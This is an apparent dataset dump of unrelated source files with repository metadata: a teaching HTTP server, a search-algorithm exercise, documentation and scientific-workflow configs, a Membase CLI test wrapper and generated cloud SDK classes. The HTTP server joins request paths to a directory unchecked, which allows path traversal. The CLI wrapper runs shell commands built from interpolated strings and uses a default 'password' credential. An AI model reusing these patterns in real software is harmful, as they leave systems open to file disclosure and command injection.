""" HTTP 2.0 接口设计: 1.提供句柄,通过句柄调用属性和方法 obj = open() lock = Lock() 2.实例化对象,通过对象设置,启动服务 t = Thread() p = Process() 3.根据功能需求,无法帮助用户决定的内容,通过参数传递 4.能够解决的问题,不要让用户去解决,需要用户解决的问题可以用重写的方法去解决 技术分析: HTTP 协议 思路分析 1.使用类进行封装 2.从用户的角度决定代码的编写 """ # 具体HTTP sever功能. from socket import * from select import * class HTTPSever: def __init__(self, host, port, dir): self.addrss = (host, port) self.host = host self.port = port self.dir = dir self.rlist = [] self.wlist = [] self.xlist = [] self.create_socket() self.bind() # 创建套接字 def create_socket(self): self.sockfd = socket() self.sockfd.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) # 绑定地址 def bind(self): self.sockfd.bind(self.addrss) # 启动服务 def server_forver(self): self.sockfd.listen(5) print("listen the port %d" % self.port) self.rlist.append(self.sockfd) while True: rs, ws, xs = select(self.rlist, self.wlist, self.xlist) self.do_rlist(rs) # 具体处理请求 def handle(self, connfd): request = connfd.recv(1024) if not request: connfd.close() self.rlist.remove(connfd) return # 提取请求内容 request_line = request.splitlines()[0] info = request_line.decode().split(" ")[1] print(connfd.getpeername(), ":", info) if info == "/" or info[-5:] == ".html": self.get_html(connfd, info) else: self.get_data(connfd,info) def get_data(self,connfd,info): response = "HTTP/1.1 200 ok\r\n" response += "\r\n" response += "<h1>Waiting for the HTTPSEVER 3.0<h1>" connfd.send(response.encode()) def get_html(self,connfd,info): if info == "/": html_name = self.dir + "/index.html" else: html_name = self.dir + info try: obj = open(html_name) except Exception: response = "HTTP/1.1 404 not found\r\n" response += "Content_Type:text/html\r\n" response += "\r\n" response += "<h1>sorry.....<h1>" else: response = "HTTP/1.1 200 OK\r\n" response += "Content_Type:text/html\r\n" response += "\r\n" response += obj.read() finally: connfd.send(response.encode()) # 具体处理rlist里的监控信号 def do_rlist(self, rs): for r in rs: if r is self.sockfd: connfd, addr = self.sockfd.accept() print("Connect from ", addr) self.rlist.append(connfd) else: self.handle(r) if __name__ == "__main__": # 希望通过HTTPSever类快速搭建http服务,用以展示自己的网页 # HOST = "0.0.0.0" # PORT = 22222 # ADDR = (HOST, PORT) # DIR = "./static" HOST = "172.40.74.151" PORT = 8888 DIR ="./hfklswn" # 实例化对象 httpfd = HTTPSever(HOST, PORT, DIR) # 启动HTTP服务 httpfd.server_forver()
4d75a2fa3fbfcd227da641b06f2ce1f1a779e02e
6a07912090214567f77e9cd941fb92f1f3137ae6
/cs212/Unit 4/28.py
ae381957925468dc57906a2813b0cfd324dea8d0
[]
no_license
rrampage/udacity-code
4ab042b591fa3e9adab0183d669a8df80265ed81
bbe968cd27da7cc453eada5b2aa29176b0121c13
refs/heads/master
2020-04-18T08:46:00.580903
2012-08-25T08:44:24
2012-08-25T08:44:24
5,352,942
3
0
null
null
null
null
UTF-8
Python
false
false
3,983
py
# cs212 ; Unit 4 ; 28

# -----------------
# User Instructions
#
# In this problem, you will generalize the bridge problem
# by writing a function bridge_problem3, that makes a call
# to lowest_cost_search.

def bridge_problem3(here):
    """Find the fastest (least elapsed time) path to the goal
    in the bridge problem."""
    start = (frozenset(here) | frozenset(['light']), frozenset())
    return lowest_cost_search(start, bsuccessors2, all_over, bcost)

def all_over(state):
    "The goal is reached when nobody (and no light) is left on the near side."
    here, there = state
    return not here

Fail = []

def lowest_cost_search(start, successors, is_goal, action_cost):
    """Return the lowest cost path, starting from start state,
    and considering successors(state) => {state:action,...},
    that ends in a state for which is_goal(state) is true,
    where the cost of a path is the sum of action costs,
    which are given by action_cost(action)."""
    explored = set() # set of states we have visited
    frontier = [ [start] ] # ordered list of paths we have blazed
    while frontier:
        path = frontier.pop(0)
        state1 = final_state(path)
        if is_goal(state1):
            return path
        explored.add(state1)
        pcost = path_cost(path)
        for (state, action) in successors(state1).items():
            if state not in explored:
                total_cost = pcost + action_cost(action)
                path2 = path + [(action, total_cost), state]
                add_to_frontier(frontier, path2)
    return Fail

def final_state(path):
    return path[-1]

def path_cost(path):
    "The total cost of a path (which is stored in a tuple with the final action)."
    if len(path) < 3:
        return 0
    else:
        action, total_cost = path[-2]
        return total_cost

def add_to_frontier(frontier, path):
    "Add path to frontier, replacing costlier path if there is one."
    # (This could be done more efficiently.)
    # Find if there is an old path to the final state of this path.
    old = None
    for i, p in enumerate(frontier):
        if final_state(p) == final_state(path):
            old = i
            break
    if old is not None and path_cost(frontier[old]) < path_cost(path):
        return # Old path was better; do nothing
    elif old is not None:
        del frontier[old] # Old path was worse; delete it
    ## Now add the new path and re-sort
    frontier.append(path)
    frontier.sort(key=path_cost)

def bsuccessors2(state):
    """Return a dict of {state:action} pairs. A state is a
    (here, there) tuple, where here and there are frozensets
    of people (indicated by their times) and/or the light."""
    here, there = state
    if 'light' in here:
        return dict(((here - frozenset([a, b, 'light']),
                      there | frozenset([a, b, 'light'])),
                     (a, b, '->'))
                    for a in here if a is not 'light'
                    for b in here if b is not 'light')
    else:
        return dict(((here | frozenset([a, b, 'light']),
                      there - frozenset([a, b, 'light'])),
                     (a, b, '<-'))
                    for a in there if a is not 'light'
                    for b in there if b is not 'light')

def bcost(action):
    "Returns the cost (a number) of an action in the bridge problem."
    # An action is an (a, b, arrow) tuple; a and b are times; arrow is a string
    a, b, arrow = action
    return max(a, b)

def test():
    here = [1, 2, 5, 10]
    assert bridge_problem3(here) == [
        (frozenset([1, 2, 'light', 10, 5]), frozenset([])),
        ((2, 1, '->'), 2),
        (frozenset([10, 5]), frozenset([1, 2, 'light'])),
        ((2, 2, '<-'), 4),
        (frozenset(['light', 10, 2, 5]), frozenset([1])),
        ((5, 10, '->'), 14),
        (frozenset([2]), frozenset([1, 10, 5, 'light'])),
        ((1, 1, '<-'), 15),
        (frozenset([1, 2, 'light']), frozenset([10, 5])),
        ((2, 1, '->'), 17),
        (frozenset([]), frozenset([1, 10, 2, 5, 'light']))]
    return 'test passes'

print test()
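# A toy usage sketch of lowest_cost_search (graph and costs invented here, not
# part of the course problem): the cheap-looking direct hop A->C costs 10, but
# the search finds the cheaper two-hop route through B.
def toy_successors(state):
    graph = {'A': {'B': 'A->B', 'C': 'A->C'},
             'B': {'C': 'B->C'},
             'C': {}}
    return graph[state]

toy_costs = {'A->B': 1, 'A->C': 10, 'B->C': 2}

path = lowest_cost_search('A', toy_successors,
                          lambda s: s == 'C',
                          lambda action: toy_costs[action])
print(path)   # ['A', ('A->B', 1), 'B', ('B->C', 3), 'C']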
c37ff8cfcff227220d098069e2f3040dce7f56e8
9145d24e2517d7f3cea6e89158806b95919449b8
/doc/conf.py
37c50aca46644bd4ce262e466fa2696daa55957c
[ "LicenseRef-scancode-warranty-disclaimer", "Apache-2.0" ]
permissive
pombredanne/coveragepy
b6de846694156581ee0b9a3348f4cfd48719855f
2364947d7814a065cf2c05d930eda94203b20f1c
refs/heads/master
2021-01-22T23:43:21.800229
2017-03-18T11:14:13
2017-03-18T11:14:13
null
0
0
null
null
null
null
UTF-8
Python
false
false
6,618
py
# -*- coding: utf-8 -*- # Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0 # For details: https://bitbucket.org/ned/coveragepy/src/default/NOTICE.txt # # coverage.py documentation build configuration file, created by # sphinx-quickstart on Wed May 13 22:18:33 2009. # # This file is execfile()d with the current directory set to its containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. import sys, os # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. #sys.path.append(os.path.abspath('.')) # on_rtd is whether we are on readthedocs.org on_rtd = os.environ.get('READTHEDOCS', None) == 'True' # -- General configuration ----------------------------------------------------- # Add any Sphinx extension module names here, as strings. They can be extensions # coming with Sphinx (named 'sphinx.ext.*') or your custom ones. extensions = [ 'sphinx.ext.autodoc', 'sphinx.ext.todo', 'sphinx.ext.ifconfig', 'sphinxcontrib.spelling', ] # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix of source filenames. source_suffix = '.rst' # The encoding of source files. #source_encoding = 'utf-8' # The master toctree document. master_doc = 'index' # General information about the project. project = u'Coverage.py' copyright = u'2009\N{EN DASH}2017, Ned Batchelder' # CHANGEME # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. # # The short X.Y version. version = '4.3.4' # CHANGEME # The full version, including alpha/beta/rc tags. release = '4.3.4' # CHANGEME # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. #language = None # There are two options for replacing |today|: either, you set today to some # non-false value, then it is used: #today = '' # Else, today_fmt is used as the format for a strftime call. #today_fmt = '%B %d, %Y' # List of documents that shouldn't be included in the build. #unused_docs = [] # List of directories, relative to source directory, that shouldn't be searched # for source files. exclude_trees = ['_build'] # The reST default role (used for this markup: `text`) to use for all documents. #default_role = None # If true, '()' will be appended to :func: etc. cross-reference text. #add_function_parentheses = True # If true, the current module name will be prepended to all description # unit titles (such as .. function::). #add_module_names = True # If true, sectionauthor and moduleauthor directives will be shown in the # output. They are ignored by default. #show_authors = False # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'sphinx' # A list of ignored prefixes for module index sorting. #modindex_common_prefix = [] # -- Options for HTML output --------------------------------------------------- # The theme to use for HTML and HTML Help pages. Major themes that come with # Sphinx are currently 'default' and 'sphinxdoc'. 
#html_theme = 'default' if not on_rtd: # only import and set the theme if we're building docs locally import sphinx_rtd_theme html_theme = 'sphinx_rtd_theme' html_theme_path = [sphinx_rtd_theme.get_html_theme_path()] # otherwise, readthedocs.org uses their theme by default, so no need to specify it # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. #html_theme_options = {} #html_style = "neds.css" #html_add_permalinks = "" # Add any paths that contain custom themes here, relative to this directory. html_theme_path = ['_templates'] # The name for this set of Sphinx documents. If None, it defaults to # "<project> v<release> documentation". #html_title = None # A shorter title for the navigation bar. Default is the same as html_title. #html_short_title = None # The name of an image file (relative to this directory) to place at the top # of the sidebar. #html_logo = None # The name of an image file (within the static path) to use as favicon of the # docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32 # pixels large. #html_favicon = None # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] # If not '', a 'Last updated on:' timestamp is inserted at every page bottom, # using the given strftime format. #html_last_updated_fmt = '%b %d, %Y' # If true, SmartyPants will be used to convert quotes and dashes to # typographically correct entities. html_use_smartypants = True # Custom sidebar templates, maps document names to template names. #html_sidebars = {} # Additional templates that should be rendered to pages, maps page names to # template names. #html_additional_pages = {} # If false, no module index is generated. html_use_modindex = False # If false, no index is generated. html_use_index = False # If true, the index is split into individual pages for each letter. #html_split_index = False # If true, links to the reST sources are added to the pages. html_show_sourcelink = False # If true, an OpenSearch description file will be output, and all pages will # contain a <link> tag referring to it. The value of this option must be the # base URL from which the finished HTML is served. #html_use_opensearch = '' # If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml"). #html_file_suffix = '.htm' # Output file base name for HTML help builder. htmlhelp_basename = 'coveragepydoc' # -- Spelling --- spelling_word_list_filename = 'dict.txt' spelling_show_suggestions = False # When auto-doc'ing a class, write the class' docstring and the __init__ docstring # into the class docs. autoclass_content = "class" prerelease = bool(max(release).isalpha()) def setup(app): app.add_stylesheet('coverage.css') app.add_config_value('prerelease', False, 'env') app.info("** Prerelease = %r" % prerelease)
744b2b5f9edcfd6d59f3a65ebfda69a83917795e
8c4ef53ec6c7df2eeeb633a53d1d931558596366
/propertyestimator/properties/solvation.py
846f77dd90fa87534dec104a50d994e4dbc33f4f
[ "MIT", "LicenseRef-scancode-unknown-license-reference" ]
permissive
MSchauperl/propertyestimator
ff7bf2d3b6bc441141258483ec991f8806b09469
9a67cb61498024c511f9bbe55536ac8e1a3c93be
refs/heads/master
2020-09-08T07:04:39.660322
2019-11-08T21:15:23
2019-11-08T21:15:23
221,055,340
0
0
NOASSERTION
2019-11-14T21:47:11
2019-11-11T19:34:28
null
UTF-8
Python
false
false
8,120
py
""" A collection of physical property definitions relating to solvation free energies. """ from propertyestimator import unit from propertyestimator.properties import PhysicalProperty from propertyestimator.properties.plugins import register_estimable_property from propertyestimator.protocols import coordinates, forcefield, miscellaneous, yank, simulation, groups from propertyestimator.substances import Substance from propertyestimator.thermodynamics import Ensemble from propertyestimator.workflow import WorkflowOptions from propertyestimator.workflow.schemas import WorkflowSchema from propertyestimator.workflow.utils import ProtocolPath @register_estimable_property() class SolvationFreeEnergy(PhysicalProperty): """A class representation of a solvation free energy property.""" @staticmethod def get_default_workflow_schema(calculation_layer, options=None): if calculation_layer == 'SimulationLayer': # Currently reweighting is not supported. return SolvationFreeEnergy.get_default_simulation_workflow_schema(options) return None @staticmethod def get_default_simulation_workflow_schema(options=None): """Returns the default workflow to use when estimating this property from direct simulations. Parameters ---------- options: WorkflowOptions The default options to use when setting up the estimation workflow. Returns ------- WorkflowSchema The schema to follow when estimating this property. """ # Setup the fully solvated systems. build_full_coordinates = coordinates.BuildCoordinatesPackmol('build_solvated_coordinates') build_full_coordinates.substance = ProtocolPath('substance', 'global') build_full_coordinates.max_molecules = 2000 assign_full_parameters = forcefield.BuildSmirnoffSystem(f'assign_solvated_parameters') assign_full_parameters.force_field_path = ProtocolPath('force_field_path', 'global') assign_full_parameters.substance = ProtocolPath('substance', 'global') assign_full_parameters.coordinate_file_path = ProtocolPath('coordinate_file_path', build_full_coordinates.id) # Perform a quick minimisation of the full system to give # YANK a better starting point for its minimisation. energy_minimisation = simulation.RunEnergyMinimisation('energy_minimisation') energy_minimisation.system_path = ProtocolPath('system_path', assign_full_parameters.id) energy_minimisation.input_coordinate_file = ProtocolPath('coordinate_file_path', build_full_coordinates.id) equilibration_simulation = simulation.RunOpenMMSimulation('equilibration_simulation') equilibration_simulation.ensemble = Ensemble.NPT equilibration_simulation.steps_per_iteration = 100000 equilibration_simulation.output_frequency = 10000 equilibration_simulation.timestep = 2.0 * unit.femtosecond equilibration_simulation.thermodynamic_state = ProtocolPath('thermodynamic_state', 'global') equilibration_simulation.system_path = ProtocolPath('system_path', assign_full_parameters.id) equilibration_simulation.input_coordinate_file = ProtocolPath('output_coordinate_file', energy_minimisation.id) # Create a substance which only contains the solute (e.g. for the # vacuum phase simulations). filter_solvent = miscellaneous.FilterSubstanceByRole('filter_solvent') filter_solvent.input_substance = ProtocolPath('substance', 'global') filter_solvent.component_role = Substance.ComponentRole.Solvent filter_solute = miscellaneous.FilterSubstanceByRole('filter_solute') filter_solute.input_substance = ProtocolPath('substance', 'global') filter_solute.component_role = Substance.ComponentRole.Solute # Setup the solute in vacuum system. 
build_vacuum_coordinates = coordinates.BuildCoordinatesPackmol('build_vacuum_coordinates') build_vacuum_coordinates.substance = ProtocolPath('filtered_substance', filter_solute.id) build_vacuum_coordinates.max_molecules = 1 assign_vacuum_parameters = forcefield.BuildSmirnoffSystem(f'assign_parameters') assign_vacuum_parameters.force_field_path = ProtocolPath('force_field_path', 'global') assign_vacuum_parameters.substance = ProtocolPath('filtered_substance', filter_solute.id) assign_vacuum_parameters.coordinate_file_path = ProtocolPath('coordinate_file_path', build_vacuum_coordinates.id) # Set up the protocol to run yank. run_yank = yank.SolvationYankProtocol('run_solvation_yank') run_yank.solute = ProtocolPath('filtered_substance', filter_solute.id) run_yank.solvent_1 = ProtocolPath('filtered_substance', filter_solvent.id) run_yank.solvent_2 = Substance() run_yank.thermodynamic_state = ProtocolPath('thermodynamic_state', 'global') run_yank.steps_per_iteration = 500 run_yank.checkpoint_interval = 50 run_yank.solvent_1_coordinates = ProtocolPath('output_coordinate_file', equilibration_simulation.id) run_yank.solvent_1_system = ProtocolPath('system_path', assign_full_parameters.id) run_yank.solvent_2_coordinates = ProtocolPath('coordinate_file_path', build_vacuum_coordinates.id) run_yank.solvent_2_system = ProtocolPath('system_path', assign_vacuum_parameters.id) # Set up the group which will run yank until the free energy has been determined to within # a given uncertainty conditional_group = groups.ConditionalGroup(f'conditional_group') conditional_group.max_iterations = 20 if options.convergence_mode != WorkflowOptions.ConvergenceMode.NoChecks: condition = groups.ConditionalGroup.Condition() condition.condition_type = groups.ConditionalGroup.ConditionType.LessThan condition.right_hand_value = ProtocolPath('target_uncertainty', 'global') condition.left_hand_value = ProtocolPath('estimated_free_energy.uncertainty', conditional_group.id, run_yank.id) conditional_group.add_condition(condition) # Define the total number of iterations that yank should run for. total_iterations = miscellaneous.MultiplyValue('total_iterations') total_iterations.value = 2000 total_iterations.multiplier = ProtocolPath('current_iteration', conditional_group.id) # Make sure the simulations gets extended after each iteration. run_yank.number_of_iterations = ProtocolPath('result', total_iterations.id) conditional_group.add_protocols(total_iterations, run_yank) # Define the full workflow schema. schema = WorkflowSchema(property_type=SolvationFreeEnergy.__name__) schema.id = '{}{}'.format(SolvationFreeEnergy.__name__, 'Schema') schema.protocols = { build_full_coordinates.id: build_full_coordinates.schema, assign_full_parameters.id: assign_full_parameters.schema, energy_minimisation.id: energy_minimisation.schema, equilibration_simulation.id: equilibration_simulation.schema, filter_solvent.id: filter_solvent.schema, filter_solute.id: filter_solute.schema, build_vacuum_coordinates.id: build_vacuum_coordinates.schema, assign_vacuum_parameters.id: assign_vacuum_parameters.schema, conditional_group.id: conditional_group.schema } schema.final_value_source = ProtocolPath('estimated_free_energy', conditional_group.id, run_yank.id) return schema
b10bd3e6fce28ba55ca234a9dcb7dd608cd4763a
0de115b69243361e7926d0a5400c1fb475a642f5
/4.5.4 CodingExercise2.py
7769a572921fc132cf0a40d0db1879e526643fc9
[]
no_license
Bill-Fujimoto/Intro-to-Python-Course
f475f1c578e33ac37a796038fdaa6ad247876c55
afe365b0233c4fadb78b2818164ab5726ecd92bb
refs/heads/master
2020-04-12T21:19:08.688112
2018-12-21T21:50:09
2018-12-21T21:50:09
162,759,968
0
0
null
null
null
null
UTF-8
Python
false
false
1,977
py
#Recall last exercise that you wrote a function, word_lengths, #which took in a string and returned a dictionary where each #word of the string was mapped to an integer value of how #long it was. # #This time, write a new function called length_words so that #the returned dictionary maps an integer, the length of a #word, to a list of words from the sentence with that length. #If a word occurs more than once, add it more than once. The #words in the list should appear in the same order in which #they appeared in the sentence. # #For example: # # length_words("I ate a bowl of cereal out of a dog bowl today.") # -> {3: ['ate', 'out', 'dog'], 1: ['i', 'a', 'a'], # 5: ['today'], 2: ['of', 'of'], 4: ['bowl', 'bowl'], 6: ['cereal']} # #As before, you should remove any punctuation and make the #string lowercase. # #Hint: To create a new list as the value for a dictionary key, #use empty brackets: lengths[wordLength] = []. Then, you would #be able to call lengths[wordLength].append(word). Note that #if you try to append to the list before creating it for that #key, you'll receive a KeyError. #Write your function here! def length_words(string): to_replace = ".,'!?" for mark in to_replace: string = string.replace(mark, "") string = string.lower() word_list = string.split() len_words = {} for word in word_list: if len(word) not in len_words: len_words[len(word)] = [] len_words[len(word)].append(word) return len_words #Below are some lines of code that will test your function. #You can change the value of the variable(s) to test your #function with different inputs. # #If your function works correctly, this will originally #print: #{1: ['i', 'a', 'a'], 2: ['of', 'of'], 3: ['ate', 'out', 'dog'], 4: ['bowl', 'bowl'], 5: ['today'], 6: ['cereal']} # #The keys may appear in a different order, but within each #list the words should appear in the order shown above. print(length_words("I ate a bowl of cereal out of a dog bowl today."))
[ "@vfr1200f1#" ]
@vfr1200f1#
3b91d9f42ee1ecda8632567b35ac5caa51d497c7
35053a371d85c2d45a4f52239d8a70b38194ef48
/Count of Matches in Tournament.py
96c8b115113e1096f964d3dcc4f40e3f4b7f16a1
[]
no_license
Kuehar/LeetCode
51d169c81a2e572ea854399fc78e1130220388f9
4555c20455f181f9dd7b3aba2a8779dea795edfb
refs/heads/master
2023-04-16T10:13:03.584541
2023-04-06T11:47:21
2023-04-06T11:47:21
243,361,421
4
0
null
null
null
null
UTF-8
Python
false
false
388
py
class Solution: def numberOfMatches(self, n: int) -> int: return n - 1 # O(1) solution: the answer is always n - 1. Every match eliminates exactly one player, # and the tournament ends once n - 1 players have been eliminated, so the number of # matches always equals the number of losers. # Runtime: 28 ms, faster than 82.44% of Python3 online submissions for Count of Matches in Tournament. # Memory Usage: 14.3 MB, less than 40.04% of Python3 online submissions for Count of Matches in Tournament.
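# Editor's addition: a quick check of the n - 1 argument (not part of the
# original submission).
if __name__ == "__main__":
    assert Solution().numberOfMatches(7) == 6    # rounds of 3 + 2 + 1 matches
    assert Solution().numberOfMatches(14) == 13
    print("ok")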
c7a6bbfb9e4f4606a0720e7f9c0efa56e7d90f30
b22588340d7925b614a735bbbde1b351ad657ffc
/athena/DataQuality/DataQualityConfigurations/python/TCTDisplay.py
6fa11e45427f043ea1f2b19da409200372d1fc14
[]
no_license
rushioda/PIXELVALID_athena
90befe12042c1249cbb3655dde1428bb9b9a42ce
22df23187ef85e9c3120122c8375ea0e7d8ea440
refs/heads/master
2020-12-14T22:01:15.365949
2020-01-19T03:59:35
2020-01-19T03:59:35
234,836,993
1
0
null
null
null
null
UTF-8
Python
false
false
1,330
py
# Copyright (C) 2002-2017 CERN for the benefit of the ATLAS collaboration from DataQualityUtils.DQWebDisplayConfig import DQWebDisplayConfig dqconfig = DQWebDisplayConfig() dqconfig.config = "TCT" dqconfig.hcfg = "/afs/cern.ch/user/a/atlasdqm/dqmdisk/tier0/han_config/Collisions/collisions_run.1.41.hcfg" dqconfig.hcfg_min10 = "/afs/cern.ch/user/a/atlasdqm/dqmdisk/tier0/han_config/Collisions/collisions_minutes10.1.9.hcfg" dqconfig.hcfg_min30 = "/afs/cern.ch/user/a/atlasdqm/dqmdisk/tier0/han_config/Collisions/collisions_minutes30.1.5.hcfg" dqconfig.hanResultsDir = "/afs/cern.ch/atlas/offline/external/FullChainTest/tier0/dqm/han_results" dqconfig.htmlDir = "/afs/cern.ch/atlas/offline/external/FullChainTest/tier0/dqm/www" dqconfig.htmlWeb = "http://atlas-project-fullchaintest.web.cern.ch/atlas-project-FullChainTest/tier0/dqm/www" dqconfig.runlist = "runlist_TCT.xml" dqconfig.indexFile = "results_TCT.html" dqconfig.lockFile = "DQWebDisplay_TCT.lock" dqconfig.dbConnection = "sqlite://;schema=MyCOOL_histo.db;dbname=OFLP200" dqconfig.dqmfOfl = "/GLOBAL/DETSTATUS/DQMFOFL" dqconfig.dbConnectionHisto = "sqlite://;schema=MyCOOL_histo.db;dbname=OFLP200" dqconfig.dqmfOflHisto = "/GLOBAL/DETSTATUS/DQMFOFLH" dqconfig.dbTagName = "DetStatusDQMFOFL-TCT"
c20a34f0a583217bc2954583f5023db885908a21
6dd08ec6b4f6351de8450a3d7e592fd6b4994119
/cbase/server/cbase-1.8.1/testrunner/lib/cli_interface.py
e6a6f9806a3859205b951f3f754ca879f82d6278
[ "Apache-2.0" ]
permissive
zhgwenming/appstack
d015e96b911fe318f9fba1bdeeea9d888d57dfba
8fe6c1dfc2f5ed4a36c335e86ae28c17b3769276
refs/heads/master
2021-01-23T13:30:19.507537
2015-11-09T06:48:35
2015-11-09T06:48:35
7,576,644
1
2
null
2016-01-05T09:16:22
2013-01-12T15:13:21
C
UTF-8
Python
false
false
6,194
py
#!/usr/bin/env python # # Copyright 2010 Membase, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # PYTHONPATH needs to be set up to point to mc_bin_client import os import subprocess DEF_USERNAME = "Administrator" DEF_PASSWORD = "password" DEF_KIND = "json" DEF_MOXI_PORT = 11211 DEF_HTTP_PORT = 8091 DEF_RAMSIZE = 256 DEF_REPLICA = 1 CLI_EXE_LOC = "../membase-cli/membase" SSH_EXE_LOC = "/opt/membase/bin/cli/membase" class CLIInterface(object): def __init__(self, server, http_port=DEF_HTTP_PORT, username=DEF_USERNAME, password=DEF_PASSWORD, kind=DEF_KIND, debug=False, ssh=False, sshkey=None): self.server = server self.http_port = http_port self.username = username self.password = password self.kind = kind self.debug = debug self.ssh = ssh self.sshkey = sshkey if (debug): self.acting_server_args = "-c %s:%d -u %s -p %s -o %s -d" % (self.server, self.http_port, self.username, self.password, self.kind) else: self.acting_server_args = "-c %s:%d -u %s -p %s -o %s" % (self.server, self.http_port, self.username, self.password, self.kind) def server_list(self): cmd = " server-list " + self.acting_server_args return self.execute_command(cmd) def server_info(self): cmd = " server-info " + self.acting_server_args return self.execute_command(cmd) def server_add(self, server_to_add, rebalance=False): if (rebalance): cmd = " rebalance " + self.acting_server_args + " --server-add=%s:%d --server-add-username=%s --server-add-password=%s"\ % (server_to_add, self.http_port, self.username, self.password) else: cmd = " server-add " + self.acting_server_args + " --server-add=%s:%d --server-add-username=%s --server-add-password=%s"\ % (server_to_add, self.http_port, self.username, self.password) return self.execute_command(cmd) def server_readd(self, server_to_readd): cmd = " server-readd " + self.acting_server_args + " --server-add=%s:%d --server-add-username=%s --server-add-password=%s"\ % (server_to_readd, self.http_port, self.username, self.password) return self.execute_command(cmd) def rebalance(self): cmd = " rebalance " + self.acting_server_args return self.execute_command(cmd) def rebalance_stop(self): cmd = " rebalance-stop " + self.acting_server_args # was " reblance-stop ", a typo the CLI would reject return self.execute_command(cmd) def rebalance_status(self): cmd = " rebalance-status " + self.acting_server_args return self.execute_command(cmd) def failover(self, server_to_failover): cmd = " failover " + self.acting_server_args + " --server-failover %s" % (server_to_failover) return self.execute_command(cmd) def cluster_init(self, c_username=DEF_USERNAME, c_password=DEF_PASSWORD, c_port=DEF_HTTP_PORT, c_ramsize=DEF_RAMSIZE): cmd = " cluster-init " + self.acting_server_args\ + " --cluster-init-username=%s --cluster-init-password=%s --cluster-init-port=%d --cluster-init-ramsize=%d"\ % (c_username, c_password, c_port, c_ramsize) return self.execute_command(cmd) def node_init(self, path): cmd = " node-init " + self.acting_server_args + " --node-init-data-path=%s" % (path) return self.execute_command(cmd) def bucket_list(self): cmd = " bucket-list " + self.acting_server_args return self.execute_command(cmd) def bucket_create(self, bucket_name, bucket_type, bucket_port, bucket_password="", bucket_ramsize=DEF_RAMSIZE, replica_count=DEF_REPLICA): cmd = " bucket-create " + self.acting_server_args\ + " --bucket=%s --bucket-type=%s --bucket-port=%d --bucket-password=%s --bucket-ramsize=%d --bucket-replica=%d"\ % (bucket_name, bucket_type, bucket_port, bucket_password, bucket_ramsize, replica_count) return self.execute_command(cmd) def bucket_edit(self, bucket_name, bucket_type, bucket_port, bucket_password, bucket_ramsize, replica_count): cmd = " bucket-edit " + self.acting_server_args\ + " --bucket=%s --bucket-type=%s --bucket-port=%d --bucket-password=%s --bucket-ramsize=%d --bucket-replica=%d"\ % (bucket_name, bucket_type, bucket_port, bucket_password, bucket_ramsize, replica_count) return self.execute_command(cmd) def bucket_delete(self, bucket_name): cmd = " bucket-delete " + self.acting_server_args + " --bucket=%s" % (bucket_name) return self.execute_command(cmd) def bucket_flush(self): return "I don't work yet :-(" def execute_command(self, cmd): if (self.ssh): return self.execute_ssh(SSH_EXE_LOC + cmd) else: return self.execute_local(CLI_EXE_LOC + cmd) def execute_local(self, cmd): rtn = "" process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdoutdata, stderrdata = process.communicate() rtn += stdoutdata return rtn def execute_ssh(self, cmd): rtn = "" if self.sshkey is None: process = subprocess.Popen("ssh root@%s \"%s\"" % (self.server, cmd), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) else: process = subprocess.Popen("ssh -i %s root@%s \"%s\"" % (self.sshkey, self.server, cmd), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdoutdata, stderrdata = process.communicate() rtn += stdoutdata return rtn
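# Editor's addition: a hypothetical usage sketch (the server address is
# illustrative, and the membase binary at CLI_EXE_LOC must exist for the
# calls to return real output); not part of the original module.
if __name__ == "__main__":
    cli = CLIInterface("192.168.0.10")
    print(cli.server_list())
    print(cli.bucket_list())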
875a564377d75822b6c87a33792ad8d32b40b7b6
a6e4a6f0a73d24a6ba957277899adbd9b84bd594
/sdk/python/pulumi_azure_native/datacatalog/outputs.py
26d9e4bddb4ce2d56c83f67f19a73cd325ca56ef
[ "BSD-3-Clause", "Apache-2.0" ]
permissive
MisinformedDNA/pulumi-azure-native
9cbd75306e9c8f92abc25be3f73c113cb93865e9
de974fd984f7e98649951dbe80b4fc0603d03356
refs/heads/master
2023-03-24T22:02:03.842935
2021-03-08T21:16:19
2021-03-08T21:16:19
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,362
py
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi SDK Generator. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union from .. import _utilities, _tables from ._enums import * __all__ = [ 'PrincipalsResponse', ] @pulumi.output_type class PrincipalsResponse(dict): """ User principals. """ def __init__(__self__, *, object_id: Optional[str] = None, upn: Optional[str] = None): """ User principals. :param str object_id: Object Id for the user :param str upn: UPN of the user. """ if object_id is not None: pulumi.set(__self__, "object_id", object_id) if upn is not None: pulumi.set(__self__, "upn", upn) @property @pulumi.getter(name="objectId") def object_id(self) -> Optional[str]: """ Object Id for the user """ return pulumi.get(self, "object_id") @property @pulumi.getter def upn(self) -> Optional[str]: """ UPN of the user. """ return pulumi.get(self, "upn") def _translate_property(self, prop): return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
494c1e3a8da4af904b0d96a5540e85b475400cc2
